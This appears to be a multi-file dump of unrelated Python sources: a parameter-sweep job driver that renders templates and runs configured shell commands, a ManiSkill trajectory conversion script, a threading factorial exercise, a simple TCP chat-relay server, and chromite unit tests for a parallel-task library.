        fileData[key.lower()] = rdata
#============================================
# generateProduct: Compute the cartesian product of
# all variables in a given order. This assumes that
# order is structured as [fastest --> slowest]
# changing variable. The use of reversed(...)
# is then required due to the order in which
# itertools.product generates the cartesian product.
#============================================
def generateProduct(dicts,order):
    """Generate the Cartesian product of a dictionary of parameters.

    *order* lists variable names fastest-changing first. Each element of the
    returned list is a dict mapping every variable name to one chosen value;
    reversing the order before calling itertools.product makes the first
    name in *order* vary fastest across the output.
    """
    slow_to_fast = list(reversed(order))
    value_lists = [dicts[name] for name in slow_to_fast]
    return [dict(zip(slow_to_fast, combo)) for combo in it.product(*value_lists)]
#============================================
# interpolateString: Recursively replace
# parameters in a given string based on
# driver, user, and [optional] input data
#============================================
def interpolateString(inStr, inputData=None, inputFmt=None, nCalls=0):
    """Recursively replace %(name) / %(name:fmt) parameters in *inStr*.

    Resolution order for each parameter: thread info, then *inputData*
    (per-run-instance values), then userData, then driverData — later
    sources override earlier ones. Resolved values are themselves
    interpolated (bounded by MAX_RECURS) and may be backtick expressions
    (see evaluateStr). Non-strings and None pass through unchanged.
    Formatting preference: inline ':fmt', else *inputFmt* keyed by the
    value's type, else plain str().
    """
    # logInfo('[interpolateString] inStr: %s nCalls: %d type:%s'%(inStr,nCalls,type(inStr)))
    MAX_RECURS = 10
    begStr = '%('
    endStr = ')'
    if(inStr is None):
        return None
    if(not isinstance(inStr,str)):
        return inStr
    outStr = inStr
    if(nCalls>=MAX_RECURS):
        abort('Maximum number of recursions exceeded ({})'.format(MAX_RECURS))
    # Get thread information
    threadInfo = getThreadInfo()
    # Move through the input string, replacing all found
    # parameters in turn
    countBeg = 0
    indBeg = -1
    indEnd = -1
    while(True):
        # Attempt to find the first instance of the
        # parameter identifier. If found, attempt to
        # find the parameter end. If the beginning
        # identifier is found, there are no more parameters
        # in the string and we can abort.
        indBeg = inStr.find(begStr, countBeg)
        if(indBeg>=0):
            indEnd = inStr.find(endStr, indBeg+1)
        else:
            break
        if(indBeg>0 and indEnd<0):
            abort('Potentially malformed string "%s"'%inStr)
        # Once a parameter has been identified, we will
        # begin attempting to resolve it. Resolution occurs
        # using defined values in the following order:
        #   1) thread info
        #   2) input values [optional]
        #   3) user values
        #   4) driver values (highest priority — later lookups overwrite)
        # Input values are passed as a dictionary to this function,
        # and are meant to be used to resolve strings that depend
        # on a particular choice of variable data (specific tuple of data).
        #
        # If an input value is used, we also check to see if the type of
        # the resolved value is provided a format. If so, we use that to
        # generate the resolved string. Otherwise, we use default formatting.
        subStr = inStr[indBeg+len(begStr):indEnd]
        # Split off an optional inline format: %(name:fmt)
        inlineFmt = None
        indTmp = subStr.find(':')
        if(indTmp>=0):
            inlineFmt = subStr[indTmp+1:]
            subStr = subStr[:indTmp]
        resolvedValue = None
        # NOTE(review): usedInput and tmpFmt are never read — dead locals?
        usedInput = False
        tmpFmt = None
        if(threadInfo is not None):
            if(subStr in threadInfo.keys()):
                resolvedValue = threadInfo[subStr]
        if(inputData is not None):
            if(subStr in inputData.keys()):
                resolvedValue = inputData[subStr]
        if(subStr in userData.keys()):
            resolvedValue = userData[subStr]
        if(subStr in driverData.keys()):
            resolvedValue = driverData[subStr]
        if(resolvedValue is None):
            abort('Unable to fully resolve "{}"'.format(begStr+subStr+endStr))
        # Recurse if the resolution results in another parameter
        resolvedValue = interpolateString(resolvedValue, inputData, inputFmt, nCalls+1)
        # If the result is an evaluatable expression (encased by ` characters),
        # perform the evaluation call. Evaluate string is, itself, recursive.
        resolvedValue = evaluateStr(resolvedValue)
        if(inlineFmt is not None):
            resolvedValue = ('{:'+inlineFmt+'}').format(resolvedValue)
        elif(inputFmt is not None and type(resolvedValue) in inputFmt.keys()):
            resolvedValue = ('{:'+inputFmt[type(resolvedValue)]+'}').format(resolvedValue)
        else:
            resolvedValue = '{}'.format(resolvedValue)
        # Update the string with the resolved value and prepare to find next
        # parameter
        outStr = outStr.replace(inStr[indBeg:indEnd+1],resolvedValue)
        countBeg = indEnd+1
    # Final return!
    return outStr
#============================================
# evaluateStr: Recursively evaluate embedded
# expressions in the provided string
#============================================
def evaluateStr(inStr):
    """Recursively evaluate backtick-delimited expressions embedded in *inStr*.

    Non-strings pass through unchanged; an odd number of backticks aborts.
    SECURITY NOTE: uses eval() on configuration text — only safe for trusted
    input files.
    """
    if(not isinstance(inStr,str)):
        return inStr
    inds = [i for i, char in enumerate(inStr) if char == '`']
    N = len(inds)
    if(N==0):
        return inStr
    if(N%2 != 0):
        abort('Odd number of evaluator characters (`) found in {:s}'.format(inStr))
    outStr = inStr
    # NOTE(review): true division — N becomes a float here; N==1 still
    # matches 1.0, so the comparison below works as intended.
    N=N/2
    if(N==1):
        # NOTE(review): assumes the backticks are the first and last
        # characters of the string — confirm callers guarantee this.
        outStr = eval(inStr[1:-1])
    else:
        # NOTE(review): inds[-1]-1 drops the character *before* the final
        # backtick; this looks like it should be inds[-1] — verify against
        # expected nested-expression inputs.
        subStr = inStr[inds[0]+1:inds[-1]-1]
        evaldStr = evaluateStr(subStr)
        # outStr = outStr.replace(subStr,evaldStr)
        outStr = evaldStr
    return outStr
#============================================
# processFiles: Process all defined files.
# Helper wrapper for processSingleFile
#============================================
def processFiles(instanceData):
    """Render every configured file section with *instanceData*.

    Iterating the (possibly empty) fileData dict makes an explicit
    empty-check unnecessary.
    """
    for fileKey in fileData:
        processSingleFile(fileKey, instanceData)
#============================================
# processSingleFile: Process a single file
# with global and instance parameters
#============================================
def processSingleFile(fileKey,instanceData):
    """Render one templated file: interpolate its 'input' template with
    driver/user/instance data and write the result to its 'output' path.

    PBS-typed outputs are additionally recorded in the module-level
    pbsFiles list for the submit script.
    """
    if(fileKey not in fileData.keys()):
        abort('Attempting to process nonexistent file with key '+fileKey)
    # Merge instance data (from specific run instance) and the file's parameters
    data = instanceData
    if('parameters' in fileData[fileKey].keys() and fileData[fileKey]['parameters']):
        data = {**data,**fileData[fileKey]['parameters']}
    # Load parameter template
    templatefile = resolveAbsPath(interpolateString(fileData[fileKey]['input'],data))
    logInfo('Loading template file {}'.format(templatefile))
    if(templatefile is None):
        abort('Parameter template file is None!')
    with open(templatefile,'r') as pfile:
        paramStr = pfile.read()
    # Replace all parameterizations with driver, user, and instance data
    paramStr = interpolateString(paramStr, data, fmtLong)
    # Write parameter file
    outputFile = resolveAbsPath(interpolateString(fileData[fileKey]['output'],data))
    logInfo('Writing param file {}'.format(outputFile))
    with open(outputFile,'w+') as pfile:
        pfile.write(paramStr)
    # If the file is of type "pbs", record its output name
    if(fileData[fileKey]['type'] == 'pbs'):
        logInfo('adding to pbs files: {:s}'.format(outputFile))
        pbsFiles.append(outputFile)
def constructPbsSubmitScript():
    """Write a shell script that cd's into each PBS run directory and
    submits its generated script with the configured submit command.

    No-op when no PBS-typed files were generated during this run.
    """
    if(not pbsFiles):
        return
    header = "#!/bin/bash"
    subscript = interpolateString(driverData['pbs_submitscript'])
    logInfo('Creating PBS submission script: {:s}'.format(subscript))
    with open(subscript,'w+') as output:
        output.write(header)
        output.write('\n')
        for f in pbsFiles:
            path, file = os.path.split(f)
            output.write('cd {:s} && {:s} {:s} && cd -\n'.format(path,driverData['pbs_subcommand'],file))
#============================================
# worker: Function called for each thread.
# Pulls a set of data off the run queue
# (from the cartesian product) and executes
# relevant activities
#============================================
def worker():
    """Execute the driver specifications for a given set of parameters (threaded).

    Pulls parameter dicts from the module-level runqueue until a None
    sentinel arrives. For each run: optionally copies the template tree,
    renders files, then runs the pre/exec/post shell commands inside the
    run directory. Filesystem/subprocess actions are gated on wetRun.
    """
    while True:
        data = runqueue.get()
        if data is None:
            return
        # Copy template to working directory
        workDir = resolveAbsPath(interpolateString(driverData['rundir'],data))
        # If the workDir exists, skip this run
        if(driverData['skipifexist'] and driverData['templatedir'] and os.path.exists(workDir)):
            logInfo('Work directory {:s} exists. Skipping this run.'.format(workDir))
            continue
        templateDir = resolveAbsPath(interpolateString(driverData['templatedir'],data))
        if(templateDir is not None):
            logInfo('Copying %s to %s'%(templateDir,workDir))
            if(wetRun):
                shutil.copytree(templateDir,workDir,symlinks=True)
        if(wetRun):
            # Ensure that run directory exists. If not, create it.
            if(not os.path.exists(workDir)):
                logInfo('Creating run directory %s'%workDir)
                path = Path(workDir)
                path.mkdir(parents=True)
        # Process files
        processFiles(data)
        # 'param_only'/'setup' runs stop after rendering files.
        if(driverData['type'] in ['param_only','setup']):
            continue
        # Perform preprocessing commands
        if(driverData['precommand'] is not None):
            precommand = interpolateString(driverData['precommand'],data)
            cmdStr = 'cd %s && %s'%(workDir,interpolateString(precommand))
            logInfo('Executing pre command: {}'.format(precommand))
            proc = subprocess.Popen(cmdStr, shell=True)
            proc.wait()
        # Run executable in working directory
        if(driverData['execcommand'] is not None):
            execcommand = interpolateString(driverData['execcommand'],data)
            cmdStr = 'cd %s && %s'%(workDir,interpolateString(execcommand))
            logInfo('Executing exec command: {}'.format(execcommand))
            proc = subprocess.Popen(cmdStr, shell=True)
            proc.wait()
        # Perform postprocessing commands
        if(driverData['postcommand'] is not None):
            postcommand = interpolateString(driverData['postcommand'],data)
            cmdStr = 'cd %s && %s'%(workDir,postcommand)
            logInfo('Executing post command: {}'.format(postcommand))
            proc = subprocess.Popen(cmdStr, shell=True)
            proc.wait()
#============================================
# setupParser: Setup command line argument parser
#============================================
def setupParser():
    """Build and return the command-line argument parser.

    Returns:
        argparse.ArgumentParser accepting a single optional -i/--input flag
        naming the YAML configuration file (default: input.yaml).
    """
    cli = argparse.ArgumentParser()
    cli.add_argument(
        '-i', '--input',
        default='input.yaml',
        help='specify input YAML file')
    return cli
#============================================
# MAIN
#============================================
if(__name__ == "__main__"):
    # Parse arguments and read the YAML configuration file.
    parser = setupParser()
    args = parser.parse_args()
    with open(args.input, 'r') as f:
        cfg = yaml.safe_load(f)
    # Initialize driver configuration
    initDriverData(cfg)
    # Initialize user configuration
    initUserData(cfg)
    # Initialize file configurations
    initFileData(cfg)
    # Initialize run configurations
    initRunData(cfg)
    # Construct cartesian product of variables for each run
    runs = []
    for r in runData.keys():
        tmp = generateProduct(runData[r]['variables'], runData[r]['variableorder'])
        # Append run parameters to each of the generated subruns
        if 'parameters' in runData[r].keys():
            for i in range(0, len(tmp)):
                tmp[i].update(runData[r]['parameters'])
        runs.extend(tmp)
    runqueue = queue.Queue()
    for r in runs:
        logInfo('Adding run info {}'.format(r))
        runqueue.put(r)
    threads = [threading.Thread(target=worker, name='{:02d}'.format(_i))
               for _i in range(driverData['nthreads'])]
    for thread in threads:
        thread.daemon = True
        logInfo('Starting thread')
        thread.start()
    # BUG FIX: each worker consumes exactly one sentinel before returning, so
    # one EOF marker must be queued PER THREAD. Previously a single None was
    # queued, leaving nthreads-1 workers blocked on runqueue.get() forever.
    for _ in threads:
        runqueue.put(None)  # one EOF marker for each thread
    # Keep the master thread alive and poll until all worker threads are done.
    # (is_alive() replaces the isAlive() alias, which was removed in Py 3.9.)
    while True:
        time.sleep(1)
        if not any(thread.is_alive() for thread in threads):
            break
    # Construct PBS submission script
    constructPbsSubmitScript()
|
convert_state.py
|
import argparse
import os
os.environ["D4RL_SUPPRESS_IMPORT_ERROR"] = "1"
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
os.environ["OMP_NUM_THREADS"] = "1"
import os.path as osp
from multiprocessing import Process
import h5py
from mani_skill_learn.env import make_gym_env, ReplayMemory
from mani_skill_learn.utils.fileio import load_h5_as_dict_array, merge_h5_trajectory
from mani_skill_learn.utils.data import sample_element_in_dict_array, compress_size
from mani_skill_learn.utils.meta import get_total_memory, flush_print
def auto_fix_wrong_name(traj):
    """Rename legacy singular trajectory keys to their plural forms, in place.

    Older trajectory files stored e.g. 'action' instead of 'actions'; this
    renames those keys and returns the same (mutated) dict.

    Args:
        traj: dict of trajectory arrays keyed by field name.

    Returns:
        The same dict with legacy keys renamed.
    """
    legacy = ('action', 'reward', 'done', 'env_level',
              'next_env_level', 'next_env_state', 'env_state')
    # BUG FIX: iterate over a snapshot of the keys — deleting entries while
    # iterating the dict itself raises RuntimeError on Python 3.
    for key in list(traj):
        if key in legacy:
            traj[key + 's'] = traj.pop(key)
    return traj
tmp_folder_in_docker = '/tmp'
def convert_state_representation(keys, args, worker_id, main_process_id):
    """Re-render stored trajectories under a new observation mode.

    Replays each trajectory's saved environment states through a live env,
    regenerates the observations (e.g. as point clouds), and writes the
    successful trajectories into /tmp/<worker_id>.h5.

    Args:
        keys: h5 group names (one per trajectory) assigned to this worker.
        args: parsed CLI namespace (env_name, obs_mode, traj_name, ...).
        worker_id: index of this worker; names the output file and gates
            progress printing to worker 0 only.
        main_process_id: pid of the parent process, used only for the
            total-memory report.
    """
    env = make_gym_env(args.env_name, unwrapped=True, obs_mode=args.obs_mode)
    assert hasattr(env, 'get_obs'), f'env {env} does not contain get_obs'
    get_obs = env.get_obs
    cnt = 0  # number of trajectories kept so far; names the output groups
    output_file = osp.join(tmp_folder_in_docker, f'{worker_id}.h5')
    if worker_id == 0:
        flush_print(f'Save trajectory to {output_file}')
    output_h5 = h5py.File(output_file, 'w')
    input_h5 = h5py.File(args.traj_name, 'r')
    for j, key in enumerate(keys):
        trajectory = load_h5_as_dict_array(input_h5[key])
        trajectory = auto_fix_wrong_name(trajectory)
        env.reset(level=trajectory['env_levels'][0])
        length = trajectory['obs'].shape[0]
        # Decide whether the trajectory counts as a success; the key names
        # vary across dataset versions, hence the three cases below.
        if 'info_eval_info_success' in trajectory:
            if 'info_keep_threshold' not in trajectory:
                success = trajectory['info_eval_info_success'][-1]
            else:
                success = trajectory['info_eval_info_success'][-1]
                keep_threshold = trajectory['info_keep_threshold'][-1]
                success = success >= keep_threshold
        elif 'eval_info_success' in trajectory:
            success = trajectory['eval_info_success'][-1]
            keep_threshold = trajectory['keep_threshold'][-1]
            success = success >= keep_threshold
        else:
            flush_print(trajectory.keys(), 'No success info')
            raise Exception("")
        if not success:
            # Unsuccessful trajectories are dropped entirely.
            if worker_id == 0:
                flush_print(f'Worker {worker_id}, Skip {j + 1}/{len(keys)}, Choose {cnt}')
            continue
        replay = ReplayMemory(length)
        next_obs = None
        for i in range(length):
            if next_obs is None:
                # First step: regenerate obs from the stored env state.
                env_state = sample_element_in_dict_array(trajectory['env_states'], i)
                env.set_state(env_state)
                obs = get_obs()
                obs = compress_size(obs)
            else:
                # Subsequent steps reuse the previous step's next_obs
                # (assumes next_env_states[i-1] == env_states[i] — the usual
                # contiguous-trajectory layout; confirm against the dataset).
                obs = next_obs
            # from mani_skill_learn.utils.data import get_shape_and_type
            # flush_print(get_shape_and_type(obs))
            # exit(0)
            next_env_state = sample_element_in_dict_array(trajectory['next_env_states'], i)
            env.set_state(next_env_state)
            next_obs = get_obs()
            next_obs = compress_size(next_obs)
            item_i = {
                'obs': obs,
                'next_obs': next_obs,
                'actions': trajectory['actions'][i],
                'dones': trajectory['dones'][i],
                'rewards': trajectory['rewards'][i],
            }
            mem = get_total_memory('G', False, init_pid=main_process_id)
            replay.push(**item_i)
            if worker_id == 0:
                flush_print(f'Convert Trajectory: choose{cnt + 1}, {j + 1}/{len(keys)}, Step {i + 1}/{length}, total mem:{mem}')
        group = output_h5.create_group(f'traj_{cnt}')
        cnt += 1
        replay.to_h5(group, with_traj_index=False)
    output_h5.close()
    flush_print(f'Finish using {output_file}')
def get_running_steps(num, n):
    """Split ``num`` work items into ``n`` near-equal chunk sizes.

    The first ``num % n`` chunks receive one extra item, so the sizes
    always sum back to ``num``.

    Args:
        num: total number of items (must be >= n).
        n: number of chunks.

    Returns:
        List of ``n`` chunk sizes, largest first.
    """
    assert num >= n
    base, remainder = divmod(num, n)
    steps = [base + 1] * remainder + [base] * (n - remainder)
    assert sum(steps) == num
    return steps
def parse_args():
    """Parse command-line options and absolutize the trajectory paths."""
    ap = argparse.ArgumentParser(description='Convert the representation of the trajectory')
    # Configurations
    ap.add_argument('--env-name', default='OpenCabinetDrawer_1045_link_0-v0',
                    help='The name of the environment')
    ap.add_argument('--traj-name',
                    default='./debug_mani_skill/OpenCabinetDrawer_1045_link_0-v0/test/trajectory.h5',
                    help='The generated trajectory with some policies')
    ap.add_argument('--output-name',
                    default='./debug_mani_skill/OpenCabinetDrawer_1045_link_0-v0/test/trajectory_pcd.h5',
                    help='The generated trajectory with some policies')
    ap.add_argument('--max-num-traj', default=-1, type=int, help='The generated trajectory with some policies')
    ap.add_argument('--obs-mode', default='pointcloud', type=str, help='The mode of the observer')
    ap.add_argument('--num-procs', default=10, type=int, help='The mode of the observer')
    # Convert setting
    ap.add_argument('--add-random', default=False, action='store_true', help='Add random trajectory')
    parsed = ap.parse_args()
    # Normalize to absolute paths so worker processes are cwd-independent.
    parsed.traj_name = osp.abspath(parsed.traj_name)
    parsed.output_name = osp.abspath(parsed.output_name)
    return parsed
def main():
    """Fan trajectory conversion out across processes and merge the results.

    Reads the module-level ``args`` namespace produced by parse_args().
    Each worker writes /tmp/<worker_id>.h5; the parent merges them into
    args.output_name and removes the per-worker temp files.
    """
    os.makedirs(osp.dirname(args.output_name), exist_ok=True)
    with h5py.File(args.traj_name, 'r') as h5_file:
        keys = sorted(h5_file.keys())
    if args.max_num_traj < 0:
        args.max_num_traj = len(keys)
    args.max_num_traj = min(len(keys), args.max_num_traj)
    args.num_procs = min(args.num_procs, args.max_num_traj)
    keys = keys[:args.max_num_traj]
    running_steps = get_running_steps(len(keys), args.num_procs)
    flush_print(f'Num of trajs {len(keys)}', args.num_procs)
    processes = []
    from copy import deepcopy
    for i, x in enumerate(running_steps):
        # Each worker gets its own slice of trajectory keys.
        p = Process(target=convert_state_representation, args=(deepcopy(keys[:x]), args, i, os.getpid()))
        keys = keys[x:]
        processes.append(p)
        p.start()
    for p in processes:
        p.join()
    files = []
    for worker_id in range(len(running_steps)):
        tmp_h5 = osp.join(tmp_folder_in_docker, f'{worker_id}.h5')
        files.append(tmp_h5)
    from shutil import rmtree
    # BUG FIX: rmtree() raises NotADirectoryError on a regular file, which
    # ignore_errors silently swallowed — so a stale .h5 output (and, below,
    # the per-worker temp files) were never actually deleted.
    if osp.isdir(args.output_name):
        rmtree(args.output_name, ignore_errors=True)
    elif osp.exists(args.output_name):
        os.remove(args.output_name)
    merge_h5_trajectory(files, args.output_name)
    for file in files:
        try:
            os.remove(file)
        except OSError:
            pass
if __name__ == '__main__':
    # Parse once in the parent; the namespace is pickled into the workers.
    args = parse_args()
    main()
|
2_multi_threads_ans.py
|
import time
import datetime
from threading import Thread
# a factorial method similar to exercise 1, but return the result via a result placeholder
def factorial(n: int, result: list) -> None:
    """Compute n! (pausing 1 s per step) and write it into result[0].

    BUG FIX: the parameter was annotated ``[int]`` — a list *containing the
    type int*, which is not a valid type hint; it is now ``list``.

    Args:
        n: non-negative integer whose factorial is computed.
        result: single-slot list used as an out-parameter so the caller's
            thread can read the value back after join().
    """
    _result = 1
    print("Started calculation for n=" + str(n))
    for i in range(1, n+1):
        # sleep for a second - release the GIL, allowing other threads to run
        time.sleep(1)
        print('[{}][{}] counter = {}'.format(datetime.datetime.now().strftime("%d-%m-%Y, %H:%M:%S"), n, i))
        # multiply factorial value
        _result = _result * i
    result[0] = _result
# to demonstrate two threads computing in parallel
if __name__ == '__main__':
    # One-slot result holders the worker threads write into.
    outcome_10 = [None]
    outcome_15 = [None]
    workers = (
        Thread(target=factorial, args=(10, outcome_10)),
        Thread(target=factorial, args=(15, outcome_15)),
    )
    # Kick off both computations concurrently.
    for worker in workers:
        worker.start()
    # Block until each worker has written its result.
    for worker in workers:
        worker.join()
    print('Factorial of 10 = {}'.format(outcome_10[0]))
    print('Factorial of 15 = {}'.format(outcome_15[0]))
|
serve.py
|
import socketserver
import socket
import threading
import time
import random
import queue
switchboard = {}
class ChatroomQueue:
    """Pair of message queues linking the two participants of a chatroom.

    Each participant receives on one queue and sends on the other; the
    assignment alternates with every call to get_queues().
    """

    def __init__(self, name):
        # ``name`` is accepted for parity with the switchboard key but is
        # not stored or used.
        self.a_queue = queue.Queue()
        self.b_queue = queue.Queue()
        # Toggles 0/1 so successive callers get mirrored queue pairs.
        self.user_set = 0

    def get_queue(self, index):
        """Return queue 0 (a) or 1 (b) by index."""
        return (self.a_queue, self.b_queue)[index]

    def get_queues(self):
        """Return (receive_queue, send_queue) for the next participant."""
        pair = (self.a_queue, self.b_queue)
        mine = self.user_set
        self.user_set = (self.user_set + 1) % 2
        return pair[mine], pair[1 - mine]
class ProtoHandler(socketserver.BaseRequestHandler):
    """Per-connection handler pairing two clients through a named chatroom.

    The first line a client sends names the room; two clients naming the
    same room are cross-wired via a shared ChatroomQueue.
    """

    def qprint(self, message):
        # Send one newline-terminated ascii line back to this client.
        self.request.sendall(bytes(message+'\n','ascii'))

    def handle(self):
        global switchboard
        try:
            # First message from the client is the chatroom name.
            self.data = self.request.recv(1024).strip().decode('ascii')
            if self.data not in switchboard.keys():
                switchboard[self.data] = ChatroomQueue(self.data)
            c_q = switchboard[self.data]
            # rec_q: messages destined for us; send_q: messages for the peer.
            rec_q, send_q = c_q.get_queues()
            while True:
                msg = []
                # Drain whatever is currently readable without blocking.
                while True:
                    try:
                        # MSG_DONTWAIT makes this recv non-blocking; when no
                        # data is pending it raises (BlockingIOError) and the
                        # bare except below breaks out of the drain loop.
                        # NOTE(review): the bare except also swallows decode
                        # errors and anything else — consider narrowing.
                        m = self.request.recv(4096, socket.MSG_DONTWAIT).strip().decode('ascii')
                        if len(m) == 0:
                            # Zero-length read: peer closed the connection.
                            c_q.user_set -= 1
                            print("killing thread {}".format(threading.current_thread().name))
                            return
                        msg.append(m)
                    except:
                        break
                msg = ''.join(msg)
                if len(msg) > 0:
                    send_q.put(msg)
                # Relay at most one pending message from the peer per cycle.
                if not rec_q.empty():
                    msg = rec_q.get()
                    self.qprint(msg)
        except Exception as e:
            print(e)
class ThreadProtoServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server that services each client connection on its own thread."""
    pass
if __name__ == '__main__':
    host = '0.0.0.0'
    port = 1234
    server = ThreadProtoServer((host, port), ProtoHandler)
    try:
        with server:
            # serve_forever runs on a daemon thread; the main thread just
            # sleeps so Ctrl-C is delivered here.
            server_thread = threading.Thread(target=server.serve_forever)
            server_thread.daemon = True
            server_thread.start()
            while True:
                time.sleep(1)
    # BUG FIX: was a bare ``except:`` — that swallowed every error (including
    # bind failures) silently. Only Ctrl-C should trigger a clean shutdown.
    except KeyboardInterrupt:
        server.shutdown()
|
parallel_unittest.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for parallel library."""
from __future__ import print_function
import contextlib
import cPickle
import mock
import multiprocessing
import os
import signal
import sys
import tempfile
import time
import unittest
try:
import Queue
except ImportError:
# Python-3 renamed to "queue". We still use Queue to avoid collisions
# with naming variables as "queue". Maybe we'll transition at some point.
# pylint: disable=F0401
import queue as Queue
from chromite.lib import cros_logging as logging
from chromite.lib import cros_test_lib
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import partial_mock
from chromite.lib import timeout_util
# pylint: disable=protected-access
_BUFSIZE = 10 ** 4
_EXIT_TIMEOUT = 30
_NUM_WRITES = 100
_NUM_THREADS = 50
_TOTAL_BYTES = _NUM_THREADS * _NUM_WRITES * _BUFSIZE
_GREETING = 'hello world'
_SKIP_FLAKY_TESTS = True
class FakeMultiprocessManager(object):
  """A fake implementation of the multiprocess manager.

  This is only intended for use with ParallelMock.
  """

  def __enter__(self, *unused_args, **unused_kwargs):
    # Nothing to acquire; the fake itself is the context value.
    return self

  def __exit__(self, *unused_args, **unused_kwargs):
    # Nothing to release; never suppresses exceptions.
    return None

  def Queue(self):
    # An ordinary multiprocessing queue suffices for in-sequence runs.
    return multiprocessing.Queue()

  def RLock(self):
    return multiprocessing.RLock()

  def dict(self, *items, **named):
    # Plain builtins stand in for managed proxy objects.
    return dict(*items, **named)

  def list(self, *items, **named):
    return list(*items, **named)
class ParallelMock(partial_mock.PartialMock):
  """Run parallel steps in sequence for testing purposes.

  This class updates chromite.lib.parallel to just run processes in
  sequence instead of running them in parallel. This is useful for
  testing.
  """

  TARGET = 'chromite.lib.parallel._BackgroundTask'
  ATTRS = ('ParallelTasks', 'TaskRunner')

  def PreStart(self):
    # Replace the real multiprocess manager with the in-process fake so no
    # helper process is spawned during tests.
    self.PatchObject(parallel, 'Manager', side_effect=FakeMultiprocessManager)
    partial_mock.PartialMock.PreStart(self)

  @contextlib.contextmanager
  def ParallelTasks(self, steps, max_parallel=None, halt_on_error=False):
    # Signature checks mirror the real implementation's contract.
    # ('long' is the Python 2 integer type; this module is Python 2 code.)
    assert max_parallel is None or isinstance(max_parallel, (int, long))
    assert isinstance(halt_on_error, bool)
    try:
      yield
    finally:
      # Sequential stand-in: run the "parallel" steps one after another,
      # after the caller's body has finished.
      for step in steps:
        step()

  def TaskRunner(self, queue, task, onexit=None, task_args=None,
                 task_kwargs=None):
    # Setup of these matches the original code.
    if task_args is None:
      task_args = []
    elif not isinstance(task_args, list):
      task_args = list(task_args)
    if task_kwargs is None:
      task_kwargs = {}
    try:
      while True:
        # Wait for a new item to show up on the queue. This is a blocking wait,
        # so if there's nothing to do, we just sit here.
        x = queue.get()
        if isinstance(x, parallel._AllTasksComplete):
          # All tasks are complete, so we should exit.
          break
        x = task_args + list(x)
        task(*x, **task_kwargs)
    finally:
      if onexit:
        onexit()
class BackgroundTaskVerifier(partial_mock.PartialMock):
  """Verify that queues are empty after BackgroundTaskRunner runs.

  BackgroundTaskRunner should always empty its input queues, even if an
  exception occurs. This is important for preventing a deadlock in the case
  where a thread fails partway through (e.g. user presses Ctrl-C before all
  input can be processed).
  """

  TARGET = 'chromite.lib.parallel'
  ATTRS = ('BackgroundTaskRunner',)

  @contextlib.contextmanager
  def BackgroundTaskRunner(self, task, *args, **kwargs):
    # Inject a known queue (unless the caller supplied one) so we can
    # inspect it after the real runner finishes.
    queue = kwargs.setdefault('queue', multiprocessing.Queue())
    args = [task] + list(args)
    try:
      # Delegate to the original (backed-up) implementation.
      with self.backup['BackgroundTaskRunner'](*args, **kwargs):
        yield queue
    finally:
      # The queue must be drained by the runner; a leftover item means a
      # potential deadlock in real usage.
      try:
        queue.get(False)
      except Queue.Empty:
        pass
      else:
        raise AssertionError('Expected empty queue after BackgroundTaskRunner')
class TestManager(cros_test_lib.TestCase):
  """Test parallel.Manager()."""

  def testSigint(self):
    """Tests that parallel.Manager() ignores SIGINT."""
    with parallel.Manager() as manager:
      queue = manager.Queue()
      # Signal the manager's helper process directly; it must survive.
      os.kill(manager._process.pid, signal.SIGINT)
      # If the manager died, this get() would fail differently than Empty.
      with self.assertRaises(Queue.Empty):
        queue.get(block=False)

  def testSigterm(self):
    """Tests that parallel.Manager() ignores SIGTERM."""
    with parallel.Manager() as manager:
      queue = manager.Queue()
      os.kill(manager._process.pid, signal.SIGTERM)
      with self.assertRaises(Queue.Empty):
        queue.get(block=False)
class TestBackgroundWrapper(cros_test_lib.TestCase):
  """Unittests for background wrapper."""

  def setUp(self):
    self.tempfile = None

  def tearDown(self):
    # Wait for children to exit.
    try:
      timeout_util.WaitForReturnValue([[]], multiprocessing.active_children,
                                      timeout=_EXIT_TIMEOUT)
    except timeout_util.TimeoutError:
      pass

    # Complain if there are any children left over.
    active_children = multiprocessing.active_children()
    for child in active_children:
      if hasattr(child, 'Kill'):
        child.Kill(signal.SIGKILL, log_level=logging.WARNING)
        child.join()
    self.assertEqual(multiprocessing.active_children(), [])
    self.assertEqual(active_children, [])

  def wrapOutputTest(self, func):
    """Run |func| with stdout redirected to a temp file; return its output."""
    # Set _PRINT_INTERVAL to a smaller number to make it easier to
    # reproduce bugs.
    with mock.patch.multiple(parallel._BackgroundTask, PRINT_INTERVAL=0.01):
      with tempfile.NamedTemporaryFile(bufsize=0) as output:
        with mock.patch.multiple(sys, stdout=output):
          func()
        # Reopen unbuffered (mode 0 — Python 2 open()) and read everything
        # the background tasks wrote.
        with open(output.name, 'r', 0) as tmp:
          tmp.seek(0)
          return tmp.read()
class TestHelloWorld(TestBackgroundWrapper):
  """Test HelloWorld output in various background environments."""

  def setUp(self):
    # Set once the background task has emitted its first write.
    self.printed_hello = multiprocessing.Event()

  def _HelloWorld(self):
    """Write 'hello world' to stdout."""
    sys.stdout.write('hello')
    sys.stdout.flush()
    sys.stdout.seek(0)
    self.printed_hello.set()

    # Wait for the parent process to read the output. Once the output
    # has been read, try writing 'hello world' again, to be sure that
    # rewritten output is not read twice.
    time.sleep(parallel._BackgroundTask.PRINT_INTERVAL * 10)
    sys.stdout.write(_GREETING)
    sys.stdout.flush()

  def _ParallelHelloWorld(self):
    """Write 'hello world' to stdout using multiple processes."""
    with parallel.Manager() as manager:
      queue = manager.Queue()
      with parallel.BackgroundTaskRunner(self._HelloWorld, queue=queue):
        queue.put([])
        self.printed_hello.wait()

  def VerifyDefaultQueue(self):
    """Verify that BackgroundTaskRunner will create a queue on it's own."""
    with parallel.BackgroundTaskRunner(self._HelloWorld) as queue:
      queue.put([])
      self.printed_hello.wait()

  def testParallelHelloWorld(self):
    """Test that output is not written multiple times when seeking."""
    out = self.wrapOutputTest(self._ParallelHelloWorld)
    self.assertEquals(out, _GREETING)

  def testMultipleHelloWorlds(self):
    """Test that multiple threads can be created."""
    parallel.RunParallelSteps([self.testParallelHelloWorld] * 2)

  def testLongTempDirectory(self):
    """Test that we can handle a long temporary directory."""
    with osutils.TempDir() as tempdir:
      new_tempdir = os.path.join(tempdir, 'xxx/' * 100)
      osutils.SafeMakedirs(new_tempdir)
